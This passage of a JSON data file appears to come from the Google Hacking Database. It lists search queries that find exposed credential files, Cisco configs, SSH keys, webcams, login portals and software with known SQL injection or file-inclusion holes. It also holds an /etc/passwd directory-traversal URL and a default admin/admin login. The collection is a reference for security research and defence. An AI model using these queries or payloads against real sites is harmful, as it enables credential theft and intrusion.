www.cyrusoft.com, that runs in your browser. The server can work with apache or as a stand alone email server.The google query and url got cut off, it should really be:(intitle:\"SilkyMail by Cyrusoft International, Inc.\")|(intitle:\"Welcome to SilkyMail\")|(intitle:\"Willkommen bei SilkyMail\")|(inurl:adv_login.php3)|(inurl:\"silkymail/imp/login.php3\")http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%28intitle%3A%22SilkyMail+by+Cyrusoft+International%2C+Inc.%22%29%7C%28intitle%3A%22Welcome+to+SilkyMail%22%29%7C%28intitle%3A%22Willkommen+bei+SilkyMail%22%29%7C%28inurl%3Aadv_login.php3%29%7C%28inurl%3A%22silkymail%2Fimp%2Flogin.php3%22%29&btnG=Search" }, { "signatureReferenceNumber": "1403", "link": "https://www.exploit-db.com/ghdb/1403/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&q=ext%3Aphp+intext%3A%22%24dbms%22%22%24dbhost%22%22%24dbuser%22%22%24dbpasswd%22%22%24table_prefix%22%22phpbb_installed%22&btnG=Google+Search", "shortDescription": "ext:php intext:\"$dbms\"\"$dbhost\"\"$dbuser\"\"$dbpasswd\"\"$table_prefix\"\"phpbb_installed\"", "textualDescription": "Hacking a phpBB forum. Here you can gather the mySQL connection information for their forum database. View the .php info by using Google's cache feature." }, { "signatureReferenceNumber": "1404", "link": "https://www.exploit-db.com/ghdb/1404/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+sendcard+-+an+advanced+PHP+e-card+program%22+-site:sendcard.org&num=100&hl=en&lr=&filter=0", "shortDescription": "\"Powered by sendcard - an advanced PHP e-card program\" -site:sendcard.org", "textualDescription": "this is for Sendcard remote commands execution,advisory/ poc exploit: http://retrogod.altervista.org/sendcard_340_xpl.html" }, { "signatureReferenceNumber": "1405", "link": "https://www.exploit-db.com/ghdb/1405/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22powered+by+xmb%22&meta=&num=100&filter=0", "shortDescription": "\"powered by xmb\"", "textualDescription": "this is for XMB" }, { "signatureReferenceNumber": "1406", "link": "https://www.exploit-db.com/ghdb/1406/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=%22powered+by+minibb+forum+software%22", "shortDescription": "\"powered by minibb forum software\"", "textualDescription": "This dork is for minibb forum software arbitrary remote inclusion. this is about the unset() issue found by S. Esser: http://www.hardened-php.net/hphp/zend_hash_del_key_or_index_vulnerability.html Try this c codes to calculate hashes if you wanna test the unset() vuln on some other app: http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=3944" }, { "signatureReferenceNumber": "1407", "link": "https://www.exploit-db.com/ghdb/1407/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=inurl%3AeStore%2Findex.cgi%3F&btnG=Cerca+con+Google&meta=&num=100&filter=0", "shortDescription": "inurl:eStore/index.cgi?", "textualDescription": "this is for eStore directory traversal, example exploit:http://[target]/[path]/eStore/index.cgi?page=../../../../../../../../etc/passwd" }, { "signatureReferenceNumber": "1408", "link": "https://www.exploit-db.com/ghdb/1408/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&q=%22login%3A+*%22+%22password%3A+*%22+filetype%3Axls", "shortDescription": "\"login: *\" \"password: *\" filetype:xls", "textualDescription": "This returns xls files containing login names and passwords. it works by showing all the xls files with password:(something)so a downside is that u do get stuff like \"password protected\", \"password services\" etc. (and the same for login)But...most of the decent ones have the login and password in the text given to you by google, so its easy to seperate the useful ones from the others." }, { "signatureReferenceNumber": "1409", "link": "https://www.exploit-db.com/ghdb/1409/", "category": "Pages containing login portals", "querystring": "http://www.google.co.uk/search?q=inurl:%2B:8443/login.php3&hl=en&lr=&client=firefox-a&rls=org.mozilla:en-GB:official_s&start=0&sa=N", "shortDescription": "inurl:+:8443/login.php3", "textualDescription": "Plesk is a multi platform control panel solution for hosting.More information: hxxp://www.swsoft.com/plesk/Vulnerability: PLESK 7.5 Reload (and lower) & PLESK 7.6 for M$ Windows path passing and disclosure] Discovered By: GuanYu" }, { "signatureReferenceNumber": "1410", "link": "https://www.exploit-db.com/ghdb/1410/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:wrcontrollite&hl=en&lr=&filter=0", "shortDescription": "inurl:wrcontrollite", "textualDescription": "Browse up to 16 security cameras at one time :)" }, { "signatureReferenceNumber": "1411", "link": "https://www.exploit-db.com/ghdb/1411/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Vsns+Lemon%22+intitle:%22Vsns+Lemon%22", "shortDescription": "\"Powered by Vsns Lemon\" intitle:\"Vsns Lemon\"", "textualDescription": "hxxp://evuln.com/vulns/106/summary.html" }, { "signatureReferenceNumber": "1412", "link": "https://www.exploit-db.com/ghdb/1412/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?hl=en&q=inurl%3A%22simplenews%2Fadmin%22", "shortDescription": "inurl:\"simplenews/admin\"", "textualDescription": "hxxp://evuln.com/vulns/94/summary.html" }, { "signatureReferenceNumber": "1413", "link": "https://www.exploit-db.com/ghdb/1413/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=inurl%3A%22%2F%3Fpagename%3DAdministratorLogin%22&btnG=Search", "shortDescription": "inurl:\"/?pagename=AdministratorLogin\"", "textualDescription": "Powered by Bariatric AdvantageAdmin Login:Admin login pages for what looks like an inhouse eshop. No obvious public exploits but I'm sure there is a way WinkMore info found here:h**p://catalinalifesciences.com/ Credit to cp for the clean up" }, { "signatureReferenceNumber": "1414", "link": "https://www.exploit-db.com/ghdb/1414/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl%3A%22/?pagename=CustomerLogin%22", "shortDescription": "inurl:\"/?pagename=CustomerLogin\"", "textualDescription": "Customer login pages for what looks like an inhouse eshop. More information here:h**p://catalinalifesciences.com/ Credit to cp for clean up." }, { "signatureReferenceNumber": "1415", "link": "https://www.exploit-db.com/ghdb/1415/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=%22LANCOM+DSL/*-*+Office+*%22+%22Entry+Page%22&num=20&filter=0", "shortDescription": "\"LANCOM DSL/*-* Office *\" \"Entry Page\"", "textualDescription": "h**p://www.lancom-systems.de/Login page for these Lancom online DSL devices." }, { "signatureReferenceNumber": "1416", "link": "https://www.exploit-db.com/ghdb/1416/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=(intitle:%22AdventNet+ManageEngine+ServiceDesk+Plus%22%7C%22Remember+Me.+Copyright+%C2%A9+2005+AdventNet+Inc.+All+rights+reserved.%22)+intext:%22Remember+Me%22+&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "intitle:\"AdventNet ManageEngine ServiceDesk Plus\" intext:\"Remember Me\"", "textualDescription": "serviceDesk Plus is a 100 % web-based Help Desk and Asset Management software.vendor: h**p://manageengine.adventnet.com/products/service-desk/index.htmlmanual: h**p://manageengine.adventnet.com/products/service-desk/help/adminguide/index.html" }, { "signatureReferenceNumber": "1417", "link": "https://www.exploit-db.com/ghdb/1417/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=%22Welcome+to+the+CyberGuard+unit!+%22&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "\"Welcome to the CyberGuard unit!\"", "textualDescription": "\"Welcome to the CyberGuard unit! To begin configuring your CyberGuard unit now, use the menu to the left, or the Quick Setup Wizard ..\" :)" }, { "signatureReferenceNumber": "1418", "link": "https://www.exploit-db.com/ghdb/1418/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=%22SnapGear+Management+Console%22+%22Welcome+to+the+SnapGear+Unit!%22+-pdf&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "\"SnapGear Management Console\" \"Welcome to the SnapGear Unit!\" -pdf", "textualDescription": "\"Welcome to the SnapGear Unit! To begin configuring your SnapGear unit now, use the menu to the left, or the Quick Setup Wizard ..\" :)PS: this software looks very much like Cyberguard." }, { "signatureReferenceNumber": "1419", "link": "https://www.exploit-db.com/ghdb/1419/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Your+Network+Device%22+Status+(LAN+%7C+WAN)&filter=0", "shortDescription": "intitle:\"Your Network Device\" Status (LAN | WAN)", "textualDescription": "Login page for the Solwise Sar715+ ADSL Router from solwise.co.uk. Thanks to jeffball55 for the identification of this \"victim\" ;)" }, { "signatureReferenceNumber": "1420", "link": "https://www.exploit-db.com/ghdb/1420/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Net2Phone+Init+Page%22&filter=0", "shortDescription": "intitle:\"Net2Phone Init Page\"", "textualDescription": "Net2Phone CommCenter\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae is software that allows you to make phone calls and send faxes to anywhere in the world." }, { "signatureReferenceNumber": "1421", "link": "https://www.exploit-db.com/ghdb/1421/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:Top+%22Vantage+Service+Gateway%22+-inurl:zyxel&hl=en&lr=&filter=0", "shortDescription": "intitle:Top \"Vantage Service Gateway\" -inurl:zyxel", "textualDescription": "VSG1200 Vantage Service Gateway (topframe), go up one level for the login page. Vendor page at h**p://www.i-tech.com.au/products/7828_ZYXEL_VSG_1200_Vantage_Service_Management.asp" }, { "signatureReferenceNumber": "1422", "link": "https://www.exploit-db.com/ghdb/1422/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:%22AppServ+Open+Project+*%22+%22AppServ+is+a+merging+open+source+software+installer+package%22+-phpbb&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"AppServ Open Project *\" \"AppServ is a merging open source software installer package\" -phpbb", "textualDescription": "Often includes phpinfo and unsecured links to phpmyadmin." }, { "signatureReferenceNumber": "1423", "link": "https://www.exploit-db.com/ghdb/1423/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:ARI+%22Phone+System+Administrator%22&hl=en&lr=&filter=0&num=100", "shortDescription": "intitle:ARI \"Phone System Administrator\"", "textualDescription": "Login page for \"Asterisk Recording Interface\" (ARI)." }, { "signatureReferenceNumber": "1424", "link": "https://www.exploit-db.com/ghdb/1424/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A\u201dEvoCam\u201d+inurl%3A\u201dwebcam.html\u201d&hl=en&num=10&lr=&ft=i&cr=&safe=images", "shortDescription": "intitle:\u201dEvoCam\u201d inurl:\u201dwebcam.html\u201d", "textualDescription": "This search identifies EvoCam cameras accessible over the Internet. There are also public exploits that target these cameras: http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=evocam&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=\n\nAuthor: Airloom" }, { "signatureReferenceNumber": "1425", "link": "https://www.exploit-db.com/ghdb/1425/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=||Powered+by+[ClipBucket+2.0.91]&hl=en&num=10&lr=&ft=i&cr=&safe=images", "shortDescription": "||Powered by [ClipBucket 2.0.91]", "textualDescription": "This search identifies clpbpucket installations. They frequently have an admin/admin default password on the administrative backend located at: http://server/admin_area/login.php .\n\nAuthor: Zhran Team" }, { "signatureReferenceNumber": "1426", "link": "https://www.exploit-db.com/ghdb/1426/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype%3Areg+reg+HKEY_CURRENT_USER+SSHHOSTKEYS&hl=en&num=10&lr=&ft=i&cr=&safe=images", "shortDescription": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "textualDescription": "This search locates private SSHHostkeys.\n\nAuthor: loganWHD" }, { "signatureReferenceNumber": "1427", "link": "https://www.exploit-db.com/ghdb/1427/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl%3A-cfg+intext%3A%22enable+password%22&hl=en&num=10&lr=&ft=i&cr=&safe=images", "shortDescription": "inurl:-cfg intext:\"enable password\"", "textualDescription": "Google search for Cisco config files (some variants below):\n\ninurl:router-confg\ninurl:-confg intext:enable password\ninurl:-config intext:\"enable password\"\ninurl:-cfg intext:\"enable secret\"\ninurl:-confg intext:enable secret\ninurl:-confg intext:\"enable secret\" \n\nAuthor: fdisk" }, { "signatureReferenceNumber": "1428", "link": "https://www.exploit-db.com/ghdb/1428/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=%22Cisco+PIX+Security+Appliance+Software+Version%22+%2B+%22Serial+Number%22+%2B+%22show+ver%22+-inurl&hl=en&num=10&lr=&ft=i&cr=&safe=images", "shortDescription": "\"Cisco PIX Security Appliance Software Version\" + \"Serial Number\" + \"show ver\" -inurl", "textualDescription": "Google search for Pix Authorization Keys \n\nAuthor: fdisk" }, { "signatureReferenceNumber": "1429", "link": "https://www.exploit-db.com/ghdb/1429/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle%3Aindex.of+cisco+asa+-site%3Acisco.com+-inurl&hl=en&num=10&lr=&ft=i&cr=&safe=images", "shortDescription": "intitle:index.of cisco asa -site:cisco.com", "textualDescription": "Google search for Pix/Asa images \n\nAuthor: fdisk" }, { "signatureReferenceNumber": "1430", "link": "https://www.exploit-db.com/ghdb/1430/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle%3Aindex.of+ios+-site%3Acisco.com+-inurl&hl=en&num=10&lr=&ft=i&cr=&safe=images", "shortDescription": "intitle:index.of ios -site:cisco.com", "textualDescription": "Google search for Cisco IOS images\n\nAuthor: fdisk" }, { "signatureReferenceNumber": "1431", "link": "https://www.exploit-db.com/ghdb/1431/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22Remote+Supervisor+Adapter+II%22+inurl%3Auserlogin_logo.ssi&hl=en&num=10&lr=&ft=i&cr=&safe=images", "shortDescription": "\"Remote Supervisor Adapter II\" inurl:userlogin_logo.ssi", "textualDescription": "IBM e-server's login pages.\n\nAuthor: DigiP" }, { "signatureReferenceNumber": "1432", "link": "https://www.exploit-db.com/ghdb/1432/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=allintext%3A%22WebServerX+Server+at%22&hl=en&num=10&lr=&ft=i&cr=&safe=images", "shortDescription": "allintext:\"WebServerX Server at\"", "textualDescription": "Quick and dirty WebserverX HTTP server google dork" }, { "signatureReferenceNumber": "1433", "link": "https://www.exploit-db.com/ghdb/1433/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=allintext%3A%22fs-admin.php%22&hl=en&num=10&lr=&ft=i&cr=&safe=images", "shortDescription": "allintext:\"fs-admin.php\"", "textualDescription": "A foothold using allintext:\"fs-admin.php\" shows the world readable directories of a plug-in that enables Wordpress to be used as a forum. Many of the results of the search also show error logs which give an attacker the server side paths including the home directory name. This name is often also used for the login to ftp and shell access, which exposes the system to attack. There is also an undisclosed flaw in version 1.3 of the software, as the author has mentioned in version 1.4 as a security fix, but does not tell us what it is that was patched.\n\nAuthor: DigiP" }, { "signatureReferenceNumber": "1434", "link": "https://www.exploit-db.com/ghdb/1434/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=allintitle%3A%22SyncThru+Web+Service%22&hl=en&num=10&lr=&ft=i&cr=&safe=images", "shortDescription": "allintitle:\"SyncThru Web Service\"", "textualDescription": "This search finds Internet-connected Samsung printer control panels." }, { "signatureReferenceNumber": "1435", "link": "https://www.exploit-db.com/ghdb/1435/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl%3A%2Fdana-na%2Fauth%2F&hl=en&num=10&lr=&ft=i&cr=&safe=images", "shortDescription": "inurl:/dana-na/auth/", "textualDescription": "Juniper SSL\n\nAuthor: bugbear" }, { "signatureReferenceNumber": "1437", "link": "https://www.exploit-db.com/ghdb/1437/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=inurl%3Aindex.php%3Fpagedb%3Drss", "shortDescription": "inurl:index.php?pagedb=rss -Vulnerability -inurl", "textualDescription": "CVE: 2007-4007\nEDB-ID: 4221\n\nThis google dork possibly exposes sites with the Article Directory (index.php page) Remote File Inclusion Vulnerability" }, { "signatureReferenceNumber": "1438", "link": "https://www.exploit-db.com/ghdb/1438/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl%3Asrc%2Flogin.php&hl=en&num=10&lr=&ft=i&cr=&safe=images", "shortDescription": "inurl:src/login.php", "textualDescription": "Locates SquirrelMail Login Pages\n\nAuthor: 0daydevilz" }, { "signatureReferenceNumber": "1439", "link": "https://www.exploit-db.com/ghdb/1439/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl%3A%22sbw2Behoerden.php%22&hl=en&num=10&lr=&ft=i&cr=&safe=images", "shortDescription": "inurl:\"sbw2Behoerden.php\"", "textualDescription": "German.Authorities.CMS SQL Injection Vulnerability. Bug: /data/sbw2Behoerden.php?sbwtyp=\n\nAuthor: Bloodman" }, { "signatureReferenceNumber": "1441", "link": "https://www.exploit-db.com/ghdb/1441/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.ca/search?q=allinurl:com_pccookbook", "shortDescription": "allinurl:com_pccookbook", "textualDescription": "Joomla Component com_pccookbook (user_id) SQL Injection Vulnerability - CVE: 2008-0844: http://www.exploit-db.com/exploits/5145" }, { "signatureReferenceNumber": "1442", "link": "https://www.exploit-db.com/ghdb/1442/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22section.php%3Fname%3Dsingers%22", "shortDescription": "inurl:\"section.php?name=singers\"", "textualDescription": "6rbScript 3.3 (section.php name) Local File Inclusion Vulnerability - CVE: 2008-6453: http://www.exploit-db.com/exploits/6520" }, { "signatureReferenceNumber": "1443", "link": "https://www.exploit-db.com/ghdb/1443/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+v1.14+powered+by+philboard+v1.14", "shortDescription": "Powered by v1.14 powered by philboard v1.14", "textualDescription": "W1L3D4 Philboard 1.2 (Blind SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-5192: http://www.exploit-db.com/exploits/5958" }, { "signatureReferenceNumber": "1444", "link": "https://www.exploit-db.com/ghdb/1444/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php%25%22Submit%25Articles%22%25%22Member%25Login%22%25%22Top%25Authors%22", "shortDescription": "inurl:index.php%\"Submit%Articles\"%\"Member%Login\"%\"Top%Authors\"", "textualDescription": "Article Directory (index.php page) Remote File Inclusion Vulnerability - CVE: 2007-4007: http://www.exploit-db.com/exploits/4221" }, { "signatureReferenceNumber": "1445", "link": "https://www.exploit-db.com/ghdb/1445/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=This+page+was+produced+using+SAM+Broadcaster.+%C3%82%C2%A9+Copyright+Spacial+Audio+Solutions,+LLC+1999+-+2004.", "shortDescription": "This page was produced using SAM Broadcaster. \u00c2\u00a9 Copyright Spacial Audio Solutions, LLC 1999 - 2004.", "textualDescription": "samPHPweb (db.php commonpath) Remote File Inclusion Vulnerability - CVE: 2008-0143: http://www.exploit-db.com/exploits/4834" }, { "signatureReferenceNumber": "1446", "link": "https://www.exploit-db.com/ghdb/1446/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+%22wordspew-rss.php%22", "shortDescription": "allinurl: \"wordspew-rss.php\"", "textualDescription": "Wordpress Plugin Wordspew Remote SQL Injection Vulnerability - CVE: 2008-0682: http://www.exploit-db.com/exploits/5039" }, { "signatureReferenceNumber": "1447", "link": "https://www.exploit-db.com/ghdb/1447/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+com_clasifier", "shortDescription": "allinurl: com_clasifier", "textualDescription": "Joomla Component com_clasifier (cat_id) SQL Injection Vulnerability - CVE: 2008-0842: http://www.exploit-db.com/exploits/5146" }, { "signatureReferenceNumber": "1448", "link": "https://www.exploit-db.com/ghdb/1448/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+%22com_galeria%22", "shortDescription": "allinurl: \"com_galeria\"", "textualDescription": "Joomla Component com_galeria Remote SQL Injection Vulnerability - CVE: 2008-0833: http://www.exploit-db.com/exploits/5134" }, { "signatureReferenceNumber": "1449", "link": "https://www.exploit-db.com/ghdb/1449/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+hwdVideoShare", "shortDescription": "Powered by hwdVideoShare", "textualDescription": "Joomla Component com_hwdvideoshare SQL Injection Vulnerability - CVE: 2008-0916: http://www.exploit-db.com/exploits/5160" }, { "signatureReferenceNumber": "1450", "link": "https://www.exploit-db.com/ghdb/1450/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+modules-php-name-Siir", "shortDescription": "allinurl: modules-php-name-Siir", "textualDescription": "PHP-Nuke Module Siir (id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5169" }, { "signatureReferenceNumber": "3609", "link": "https://www.exploit-db.com/ghdb/3609/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\"", "shortDescription": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\"", "textualDescription": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\"\n\nor refined\n\ninurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" \"index of\"\n\nVarious \"tinybrowser\" vulnerabilities: \nhttp://www.exploit-db.com/exploits/9296/\n\nDigiP" }, { "signatureReferenceNumber": "1452", "link": "https://www.exploit-db.com/ghdb/1452/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+id+%22com_jooget%22", "shortDescription": "allinurl: id \"com_jooget\"", "textualDescription": "Joomla Component jooget" }, { "signatureReferenceNumber": "1453", "link": "https://www.exploit-db.com/ghdb/1453/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+%22modules/wfdownloads/viewcat.php%3Fcid%22", "shortDescription": "allinurl: \"modules/wfdownloads/viewcat.php?cid\"", "textualDescription": "XOOPS Module wfdownloads (cid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5218" }, { "signatureReferenceNumber": "1454", "link": "https://www.exploit-db.com/ghdb/1454/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+%22modules/eEmpregos/index.php%22", "shortDescription": "allinurl: \"modules/eEmpregos/index.php\"", "textualDescription": "XOOPS Module eEmpregos (cid) Remote SQL Injection Vulnerability - CVE: 2008-0874: http://www.exploit-db.com/exploits/5157" }, { "signatureReferenceNumber": "1455", "link": "https://www.exploit-db.com/ghdb/1455/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+Active+PHP+Bookmarks+v1.1.02", "shortDescription": "Powered by Active PHP Bookmarks v1.1.02", "textualDescription": "Active PHP Bookmarks 1.1.02 Remote SQL Injection Vulnerability - CVE: 2008-3748: http://www.exploit-db.com/exploits/6277" }, { "signatureReferenceNumber": "1456", "link": "https://www.exploit-db.com/ghdb/1456/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=powered+by+Site+Sift", "shortDescription": "powered by Site Sift", "textualDescription": "Site Sift Listings (id) Remote SQL Injection Vulnerability - CVE: 2008-1869: http://www.exploit-db.com/exploits/5383" }, { "signatureReferenceNumber": "1457", "link": "https://www.exploit-db.com/ghdb/1457/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Create+your+own+free+webring+and+bring+traffic+to+your+website.+Join+now,+it's+free!%22", "shortDescription": "\"Create your own free webring and bring traffic to your website. Join now, it's free!\"", "textualDescription": "Prozilla Webring Website Script (category.php cat) Remote SQL Injection - CVE: 2007-4362: http://www.exploit-db.com/exploits/4284" }, { "signatureReferenceNumber": "1458", "link": "https://www.exploit-db.com/ghdb/1458/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_joomladate", "shortDescription": "inurl:com_joomladate", "textualDescription": "Joomla Component JoomlaDate (user) SQL injection Vulnerability - CVE: 2008-6068: http://www.exploit-db.com/exploits/5748" }, { "signatureReferenceNumber": "1459", "link": "https://www.exploit-db.com/ghdb/1459/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+ILIAS%22", "shortDescription": "\"powered by ILIAS\"", "textualDescription": "ILIAS 3.7.4 (ref_id) Blind SQL Injection Vulnerability - CVE: 2008-5816: http://www.exploit-db.com/exploits/7570" }, { "signatureReferenceNumber": "1461", "link": "https://www.exploit-db.com/ghdb/1461/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+%22index.php%3Foption%3Dcom_doc%22", "shortDescription": "allinurl: \"index.php?option=com_doc\"", "textualDescription": "Joomla Component com_doc Remote SQL Injection Vulnerability - CVE: 2008-0772: http://www.exploit-db.com/exploits/5080" }, { "signatureReferenceNumber": "1462", "link": "https://www.exploit-db.com/ghdb/1462/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+GL-SH+DEAF+forum+6.5.5+final.", "shortDescription": "Powered by GL-SH DEAF forum 6.5.5 final.", "textualDescription": "PHP Forum ohne My SQL Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/10757" }, { "signatureReferenceNumber": "1465", "link": "https://www.exploit-db.com/ghdb/1465/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:com_simpleshop", "shortDescription": "inurl:com_simpleshop", "textualDescription": "Joomla Component simpleshop 3.4 SQL injection Vulnerability - CVE: 2008-2568: http://www.exploit-db.com/exploits/5743" }, { "signatureReferenceNumber": "1466", "link": "https://www.exploit-db.com/ghdb/1466/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22index.php%3Fpageid%3D%22+Property+Listings", "shortDescription": "inurl:\"index.php?pageid=\" Property Listings", "textualDescription": "Realtor 747 (index.php categoryid) Remote SQL Injection Vulnerbility - CVE: 2007-3810: http://www.exploit-db.com/exploits/4184" }, { "signatureReferenceNumber": "1467", "link": "https://www.exploit-db.com/ghdb/1467/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Smoothflash%22", "shortDescription": "\"Powered by Smoothflash\"", "textualDescription": "Smoothflash (admin_view_image.php cid) SQL Injection Vulnerability - CVE: 2008-1623: http://www.exploit-db.com/exploits/5322" }, { "signatureReferenceNumber": "1468", "link": "https://www.exploit-db.com/ghdb/1468/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=display_blog.php", "shortDescription": "display_blog.php", "textualDescription": "Social Site Generator (sgc_id) Remote SQL Injection Vulnerability - CVE: 2008-6419: http://www.exploit-db.com/exploits/5701" }, { "signatureReferenceNumber": "1469", "link": "https://www.exploit-db.com/ghdb/1469/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Snipe+Gallery+v.3.1.5+by+Snipe.Net", "shortDescription": "Snipe Gallery v.3.1.5 by Snipe.Net", "textualDescription": "snipe gallery Script Sql Injection: http://www.exploit-db.com/exploits/14053" }, { "signatureReferenceNumber": "1470", "link": "https://www.exploit-db.com/ghdb/1470/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+AspDownload", "shortDescription": "Powered by AspDownload", "textualDescription": "ASP Download 1.03 Arbitrary Change Administrator Account Vulnerability - CVE: 2008-6739: http://www.exploit-db.com/exploits/5780" }, { "signatureReferenceNumber": "1471", "link": "https://www.exploit-db.com/ghdb/1471/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=DA+Mailing+List+System+V2+Powered+by+DigitalArakan.Net", "shortDescription": "DA Mailing List System V2 Powered by DigitalArakan.Net", "textualDescription": "DA Mailing List System V2 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/11348" }, { "signatureReferenceNumber": "1472", "link": "https://www.exploit-db.com/ghdb/1472/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+By+AJ+Auction+Web", "shortDescription": "Powered By AJ Auction Web", "textualDescription": "AJ Auction Web 2.0 (cate_id) SQL Injection Vulnerability - CVE: 2008-2860: http://www.exploit-db.com/exploits/5867" }, { "signatureReferenceNumber": "1473", "link": "https://www.exploit-db.com/ghdb/1473/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=''showad.php%3Flistingid%3D''", "shortDescription": "''showad.php?listingid=''", "textualDescription": "BM Classifieds 20080409 Multiple SQL Injection Vulnerabilities - CVE: 2008-1272: http://www.exploit-db.com/exploits/5223" }, { "signatureReferenceNumber": "1474", "link": "https://www.exploit-db.com/ghdb/1474/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+My+PHP+Indexer+1.0%22", "shortDescription": "\"Powered by My PHP Indexer 1.0\"", "textualDescription": "My PHP Indexer 1.0 (index.php) Local File Download Vulnerability - CVE: 2008-6183: http://www.exploit-db.com/exploits/6740" }, { "signatureReferenceNumber": "1475", "link": "https://www.exploit-db.com/ghdb/1475/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+%22com_rapidrecipe%22user_id", "shortDescription": "allinurl: \"com_rapidrecipe\"user_id", "textualDescription": "Joomla Component rapidrecipe 1.6.5 SQL Injection Vulnerability - CVE: 2008-0754: http://www.exploit-db.com/exploits/5103" }, { "signatureReferenceNumber": "1476", "link": "https://www.exploit-db.com/ghdb/1476/", "category": "Advisories and Vulnerabilities", "querystring": 